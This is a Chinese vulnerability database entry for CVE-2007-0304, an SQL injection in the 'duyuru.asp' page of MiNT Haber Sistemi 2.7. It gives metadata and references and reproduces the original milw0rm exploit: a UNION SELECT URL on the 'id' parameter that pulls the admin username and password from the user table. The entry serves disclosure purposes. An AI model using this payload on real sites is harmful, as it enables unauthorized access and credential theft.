MiNT Haber Sistemi 'duyuru.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111995 漏洞类型 SQL注入
发布时间 2007-01-12 更新时间 2007-01-17
CVE编号 CVE-2007-0304 CNNVD-ID CNNVD-200701-275
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3120
https://www.securityfocus.com/bid/82002
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-275
|漏洞详情
MiNTHaberSistemi2.7版本的duyuru.asp中存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意的SQL指令。
|漏洞EXP
###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi :  USERNAME
#Duyuru Metni  :    PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-12]
|受影响的产品
Mint Haber Sistemi 2.7
|参考资料

来源:MILW0RM
名称:3120
链接:http://www.milw0rm.com/exploits/3120
来源:VUPEN
名称:ADV-2007-0175
链接:http://www.frsirt.com/english/advisories/2007/0175
来源:SECUNIA
名称:23756
链接:http://secunia.com/advisories/23756
来源:OSVDB
名称:32820
链接:http://osvdb.org/32820
来源:MILW0RM
名称:3120
链接:http://milw0rm.com/exploits/3120